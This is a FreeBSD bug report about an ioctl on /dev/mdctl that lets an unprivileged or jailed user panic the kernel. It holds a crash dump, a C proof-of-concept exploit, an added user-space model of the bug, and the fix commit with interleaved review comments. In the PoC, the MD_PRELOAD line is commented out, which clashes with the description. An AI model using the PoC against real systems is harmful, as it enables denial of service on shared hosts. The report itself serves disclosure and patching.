From nobody@FreeBSD.org  Fri Jul  6 16:32:11 2012
Return-Path: <nobody@FreeBSD.org>
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id A2B4A106566C
	for <freebsd-gnats-submit@FreeBSD.org>; Fri,  6 Jul 2012 16:32:11 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from red.freebsd.org (red.freebsd.org [IPv6:2001:4f8:fff6::22])
	by mx1.freebsd.org (Postfix) with ESMTP id 8DD9D8FC12
	for <freebsd-gnats-submit@FreeBSD.org>; Fri,  6 Jul 2012 16:32:11 +0000 (UTC)
Received: from red.freebsd.org (localhost [127.0.0.1])
	by red.freebsd.org (8.14.4/8.14.4) with ESMTP id q66GWAQ6021895
	for <freebsd-gnats-submit@FreeBSD.org>; Fri, 6 Jul 2012 16:32:11 GMT
	(envelope-from nobody@red.freebsd.org)
Received: (from nobody@localhost)
	by red.freebsd.org (8.14.4/8.14.4/Submit) id q66GWAfw021894;
	Fri, 6 Jul 2012 16:32:10 GMT
	(envelope-from nobody)
Message-Id: <201207061632.q66GWAfw021894@red.freebsd.org>
Date: Fri, 6 Jul 2012 16:32:10 GMT
From: Filip Palian <filip.palian@pjwstk.edu.pl>
To: freebsd-gnats-submit@FreeBSD.org
Subject: System crash via ioctl() on mdctl.
X-Send-Pr-Version: www-3.1
X-GNATS-Notify:

>Number:         169683
>Category:       kern
>Synopsis:       [md] [panic] System crash via ioctl() on mdctl.
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    jh
>State:          patched
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Fri Jul 06 16:40:03 UTC 2012
>Closed-Date:    
>Last-Modified:  Fri Jan  4 12:10:00 UTC 2013
>Originator:     Filip Palian
>Release:        FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
A user who has read permission on "/dev/mdctl" is able to crash the system (also from within a jail, if the device is provided there by devfs(.rules)) via the ioctl() handler in "/usr/src/sys/dev/md/md.c:1127". The crash occurs in the function bcopy() (md.c:491) called from mdstart_preload() (md.c:493). Some detailed information is included below.

-- cut --
fbsd dumped core - see /var/crash/vmcore.0
..
panic: page fault
..
Unread portion of the kernel message buffer:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address   = 0xd550ba7a
fault code              = supervisor read, page not present
instruction pointer     = 0x20:0xc0d46bfe
stack pointer           = 0x28:0xd8e13ca0
frame pointer           = 0x28:0xd8e13cbc
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 3154 (md671657984)
trap number             = 12
panic: page fault
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b157 at kdb_backtrace+0x47
#1 0xc0a186b7 at panic+0x117
#2 0xc0d48cf3 at trap_fatal+0x323
#3 0xc0d48fa0 at trap_pfault+0x2a0
#4 0xc0d49b35 at trap+0x465
#5 0xc0d32a8c at calltrap+0x6
#6 0xc0731b12 at md_kthread+0x232
#7 0xc09ea997 at fork_exit+0x97
#8 0xc0d32b04 at fork_trampoline+0x8
Uptime: 9h48m43s
Physical memory: 1007 MB
Dumping 108 MB: 93 77 61 45 29 13

--

# nm -n /usr/obj/usr/src/sys/GENERIC/kernel.debug |grep c0d46b
c0d46b28 T bzero
c0d46b44 T sse2_pagezero
c0d46b64 T i686_pagezero
c0d46ba4 T fillw
c0d46bb8 T bcopyb
c0d46be4 T bcopy        <--- panicked here on $esi (0xd550ba7a)

--

(kgdb) bt
#0  doadump (textdump=1) at pcpu.h:244
#1  0xc0a1845a in kern_reboot (howto=260) at /usr/src/sys/kern/kern_shutdown.c:442
#2  0xc0a186f1 in panic (fmt=Variable "fmt" is not available.
) at /usr/src/sys/kern/kern_shutdown.c:607
#3  0xc0d48cf3 in trap_fatal (frame=0xd8e13c60, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:975
#4  0xc0d48fa0 in trap_pfault (frame=0xd8e13c60, usermode=0, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:888
#5  0xc0d49b35 in trap (frame=0xd8e13c60) at /usr/src/sys/i386/i386/trap.c:558
#6  0xc0d32a8c in calltrap () at /usr/src/sys/i386/i386/exception.s:168
#7  0xc0d46bfe in bcopy () at /usr/src/sys/i386/i386/support.s:196
Previous frame inner to this frame (corrupt stack?)
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
Validate input data from the user to xmdctlioctl() in "/usr/src/sys/dev/md/md.c".

To prevent evil users from doing bad things, administrators should ensure that "/dev/mdctl" permissions are +rw (600) only for root.

For servers where jails are provided for untrusted users (e.g. hosting companies), access to the "/dev/mdctl" device should be forbidden/hidden using devfs.rules.

Patch attached with submission follows:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>


int main()
{
	int f;
	struct md_ioctl s;
	struct stat ss;

	/*
	 * Only these fields are set; the rest of the request is left
	 * uninitialized, as submitted (the process name "md671657984" in
	 * the panic shows md_unit was whatever happened to be on the stack).
	 */
	s.md_version = MDIOVERSION;
	/* MD_PRELOAD is the type that reaches mdcreate_preload()/mdstart_preload() (see Description) */
	//s.md_type = MD_PRELOAD;
	s.md_type = MD_MALLOC;
	/* this one becomes sc->pl_ptr */
	s.md_base = 0x41414141-0x200;

	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit (0);
	}

	/* read access is all that is needed: the ioctl() path does not require a writable fd */
	f = open("/dev/mdctl", O_RDONLY, 0);
	if (f < 0) {
		printf("open(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit (0);
	}

	printf("say goodnight...\n");

	if (ioctl(f, MDIOCATTACH, &s) < 0)
		printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));

	printf("no +r no fun\n");

	close(f);
	exit (0);
}
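As an added example that is not part of this PR or of FreeBSD's md.c: a user-space model of the attach and read path the Description and the r243372 fix describe. The two checks in the vulnerable attach follow the deleted mdcreate_preload() body; the type values, the trimmed struct layouts, the read helper and the stand-in image buffer are assumptions made for the illustration.

```c
/*
 * Added example, not code from the PR or from FreeBSD's md.c: a user-space
 * model of the md(4) preload attach path. Field names follow md.c where the
 * PR quotes them; the enum values, struct layouts and helpers are assumed.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum md_types { MD_MALLOC = 1, MD_PRELOAD = 2 };  /* assumed values */
#define MD_AUTOUNIT 0x01                          /* assumed values */
#define MD_FORCE    0x02

struct md_ioctl {              /* the user-supplied request, trimmed */
	int      md_type;
	int      md_options;
	uint64_t md_base;      /* becomes sc->pl_ptr */
	int64_t  md_mediasize; /* becomes sc->pl_len */
};

struct md_s {                  /* per-unit softc, trimmed */
	int            type;
	unsigned char *pl_ptr;
	size_t         pl_len;
	int64_t        mediasize;
};

/* Before r243372: the only validation of md_base is "not zero". */
static int
md_attach_vuln(struct md_s *sc, const struct md_ioctl *mdio)
{
	sc->mediasize = mdio->md_mediasize;
	if (mdio->md_type != MD_PRELOAD)
		return (EINVAL);               /* other types not modelled */
	if (mdio->md_options & ~(MD_AUTOUNIT | MD_FORCE))
		return (EINVAL);
	if (mdio->md_base == 0)
		return (EINVAL);
	sc->pl_ptr = (unsigned char *)(uintptr_t)mdio->md_base;  /* integer -> pointer */
	sc->pl_len = (size_t)sc->mediasize;
	sc->type = MD_PRELOAD;
	return (0);
}

/* After r243372: MD_PRELOAD is refused before any pointer is formed. */
static int
md_attach_fixed(struct md_s *sc, const struct md_ioctl *mdio)
{
	sc->mediasize = mdio->md_mediasize;
	if (mdio->md_type == MD_PRELOAD)
		return (EOPNOTSUPP);
	return (EINVAL);
}

/*
 * Model of a read serviced by mdstart_preload(): the copy source is
 * pl_ptr + off, whatever pl_ptr holds. With the PoC's md_base this is the
 * bcopy() that faulted in md_kthread in the backtrace above.
 */
static int
md_read_preload(const struct md_s *sc, size_t off, void *buf, size_t len)
{
	if (sc->type != MD_PRELOAD || off > sc->pl_len || len > sc->pl_len - off)
		return (EIO);
	memcpy(buf, sc->pl_ptr + off, len);
	return (0);
}

/* Constructed stand-in for an image the boot loader would have preloaded. */
static unsigned char image[512] = "MDIMAGE";

static struct md_ioctl
request(int type, uint64_t base)
{
	struct md_ioctl mdio;

	memset(&mdio, 0, sizeof(mdio));
	mdio.md_type = type;
	mdio.md_base = base;
	mdio.md_mediasize = sizeof(image);
	return (mdio);
}

/* The PoC's base is accepted by the old attach: returns 0, pl_ptr is garbage. */
int
demo_bogus_base_accepted(void)
{
	struct md_s sc = { 0 };
	struct md_ioctl mdio = request(MD_PRELOAD, 0x41414141 - 0x200);

	return (md_attach_vuln(&sc, &mdio));
}

/* The same request against the fixed attach: EOPNOTSUPP. */
int
demo_bogus_base_rejected(void)
{
	struct md_s sc = { 0 };
	struct md_ioctl mdio = request(MD_PRELOAD, 0x41414141 - 0x200);

	return (md_attach_fixed(&sc, &mdio));
}

/* A real image behind pl_ptr reads back through the same path: returns 0. */
int
demo_legit_preload_read(void)
{
	struct md_s sc = { 0 };
	struct md_ioctl mdio = request(MD_PRELOAD, (uintptr_t)image);
	char out[8];
	int error;

	if ((error = md_attach_vuln(&sc, &mdio)) != 0)
		return (error);
	if ((error = md_read_preload(&sc, 0, out, sizeof(out))) != 0)
		return (error);
	return (memcmp(out, "MDIMAGE", 8) == 0 ? 0 : EIO);
}

int
main(void)
{
	printf("old attach, bogus base: %d (0 = accepted)\n", demo_bogus_base_accepted());
	printf("new attach, bogus base: %d (EOPNOTSUPP is %d)\n",
	    demo_bogus_base_rejected(), EOPNOTSUPP);
	printf("read of a real image: %d (0 = ok)\n", demo_legit_preload_read());
	/* md_read_preload() after the bogus attach is deliberately never called. */
	return (0);
}
```

The point the model makes is the one the backtrace shows: the ioctl itself succeeds with any non-zero md_base, and the bad pointer is only dereferenced later, when the md worker thread (md_kthread) services I/O. The fix refuses MD_PRELOAD before a pointer is ever formed; the "check that the range is mapped" suggested by the deleted XXX comment would not have been enough, since a mapped range still lets an unprivileged caller read kernel memory through the disk, and the same comment notes read-only was never implemented.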


>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->closed 
State-Changed-By: linimon 
State-Changed-When: Tue Jul 17 21:45:43 UTC 2012 
State-Changed-Why:  
Superseded by kern/169947. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169683 
State-Changed-From-To: closed->open 
State-Changed-By: linimon 
State-Changed-When: Wed Jul 18 14:22:00 UTC 2012 
State-Changed-Why:  
Apparently this is a different panic.  I was confused by the similarity 
in the Subject lines. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169683 
Responsible-Changed-From-To: freebsd-bugs->jh 
Responsible-Changed-By: jh 
Responsible-Changed-When: Tue Nov 6 15:58:42 UTC 2012 
Responsible-Changed-Why:  
Take. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169683 
State-Changed-From-To: open->patched 
State-Changed-By: jh 
State-Changed-When: Wed Nov 21 17:08:31 UTC 2012 
State-Changed-Why:  
Patched in head (r243372). 

Thanks for the report! 

http://www.freebsd.org/cgi/query-pr.cgi?pr=169683 

From: dfilter@FreeBSD.ORG (dfilter service)
To: bug-followup@FreeBSD.org
Cc:  
Subject: Re: kern/169683: commit references a PR
Date: Fri,  4 Jan 2013 12:07:07 +0000 (UTC)

 Author: jh
 Date: Fri Jan  4 12:06:59 2013
 New Revision: 245038
 URL: http://svnweb.freebsd.org/changeset/base/245038
 
 Log:
   MFC r243372:
   
   Disallow attaching preloaded memory disks via ioctl.
   
   - The feature is dangerous because the kernel code didn't check
     validity of the memory address provided from user space.
   - It seems that mdconfig(8) never really supported attaching preloaded
     memory disks.
   - Preloaded memory disks are automatically attached during md(4)
     initialization. Thus there shouldn't be much use for the feature.
   
   PR:		kern/169683
 
 Modified:
   stable/9/sbin/mdconfig/mdconfig.c
   stable/9/sys/dev/md/md.c
 Directory Properties:
   stable/9/sbin/mdconfig/   (props changed)
   stable/9/sys/   (props changed)
   stable/9/sys/dev/   (props changed)
 
 Modified: stable/9/sbin/mdconfig/mdconfig.c
 ==============================================================================
 --- stable/9/sbin/mdconfig/mdconfig.c	Fri Jan  4 11:57:27 2013	(r245037)
 +++ stable/9/sbin/mdconfig/mdconfig.c	Fri Jan  4 12:06:59 2013	(r245038)
 @@ -62,7 +62,7 @@ usage(void)
  "       mdconfig -d -u unit [-o [no]force]\n"
  "       mdconfig -l [-v] [-n] [-u unit]\n"
  "       mdconfig file\n");
 -	fprintf(stderr, "\t\ttype = {malloc, preload, vnode, swap}\n");
 +	fprintf(stderr, "\t\ttype = {malloc, vnode, swap}\n");
  	fprintf(stderr, "\t\toption = {cluster, compress, reserve}\n");
  	fprintf(stderr, "\t\tsize = %%d (512 byte blocks), %%db (B),\n");
  	fprintf(stderr, "\t\t       %%dk (kB), %%dm (MB), %%dg (GB) or\n");
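Review bot: the usage text drops `preload` from the type list, but the only files touched in this revision are mdconfig.c and md.c; if the mdconfig(8) man page still lists `preload` under `-t type`, it should be updated in the same MFC so the documented and accepted types agree.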
 @@ -115,9 +115,6 @@ main(int argc, char **argv)
  			if (!strcmp(optarg, "malloc")) {
  				mdio.md_type = MD_MALLOC;
  				mdio.md_options = MD_AUTOUNIT | MD_COMPRESS;
 -			} else if (!strcmp(optarg, "preload")) {
 -				mdio.md_type = MD_PRELOAD;
 -				mdio.md_options = 0;
  			} else if (!strcmp(optarg, "vnode")) {
  				mdio.md_type = MD_VNODE;
  				mdio.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;
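Review bot: removing the `preload` branch is cosmetic from a security standpoint: an older mdconfig binary (or any program building its own `struct md_ioctl`, as the PoC in this PR does) can still send MD_PRELOAD, so the protection has to come from the kernel hunk below, where that type now yields EOPNOTSUPP; here the only effect is that `-t preload` is reported by the tool as an unknown type instead of reaching the kernel.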
 
 Modified: stable/9/sys/dev/md/md.c
 ==============================================================================
 --- stable/9/sys/dev/md/md.c	Fri Jan  4 11:57:27 2013	(r245037)
 +++ stable/9/sys/dev/md/md.c	Fri Jan  4 12:06:59 2013	(r245038)
 @@ -854,27 +854,6 @@ mdinit(struct md_s *sc)
  	    DEVSTAT_ALL_SUPPORTED, DEVSTAT_TYPE_DIRECT, DEVSTAT_PRIORITY_MAX);
  }
  
 -/*
 - * XXX: we should check that the range they feed us is mapped.
 - * XXX: we should implement read-only.
 - */
 -
 -static int
 -mdcreate_preload(struct md_s *sc, struct md_ioctl *mdio)
 -{
 -
 -	if (mdio->md_options & ~(MD_AUTOUNIT | MD_FORCE))
 -		return (EINVAL);
 -	if (mdio->md_base == 0)
 -		return (EINVAL);
 -	sc->flags = mdio->md_options & MD_FORCE;
 -	/* Cast to pointer size, then to pointer to avoid warning */
 -	sc->pl_ptr = (u_char *)(uintptr_t)mdio->md_base;
 -	sc->pl_len = (size_t)sc->mediasize;
 -	return (0);
 -}
 -
 -
  static int
  mdcreate_malloc(struct md_s *sc, struct md_ioctl *mdio)
  {
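Review bot: the deleted function's own XXX comment ("we should check that the range they feed us is mapped") names the root cause of this PR: the only validation was `mdio->md_base == 0`, after which the caller's integer was cast straight into `sc->pl_ptr` and `sc->pl_len` was taken from `sc->mediasize`, both user-controlled. Deleting the function rather than adding a mapped-range check is the right call, since a mapped range would still expose kernel memory through the disk and, per the second XXX, read-only was never implemented. Worth double-checking that nothing else still references mdcreate_preload() or relies on `sc->flags` being set from `MD_FORCE` for preload units.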
 @@ -1186,8 +1165,12 @@ xmdctlioctl(struct cdev *dev, u_long cmd
  			error = mdcreate_malloc(sc, mdio);
  			break;
  		case MD_PRELOAD:
 -			sc->start = mdstart_preload;
 -			error = mdcreate_preload(sc, mdio);
 +			/*
 +			 * We disallow attaching preloaded memory disks via
 +			 * ioctl. Preloaded memory disks are automatically
 +			 * attached in g_md_init().
 +			 */
 +			error = EOPNOTSUPP;
  			break;
  		case MD_VNODE:
  			sc->start = mdstart_vnode;
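Review bot: `error = EOPNOTSUPP` is now set without `sc->start` ever being assigned for this type, so the error path after the switch must tear the unit down without calling through `sc->start`; please confirm the failed-attach cleanup does not assume it is non-NULL. Also, the new comment says where preloaded disks are attached but not why the ioctl refuses them; one line stating that the address came from user space and was never validated (the rationale in the commit log) would help the next reader.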
 _______________________________________________
 svn-src-all@freebsd.org mailing list
 http://lists.freebsd.org/mailman/listinfo/svn-src-all
 To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org"
 
>Unformatted:
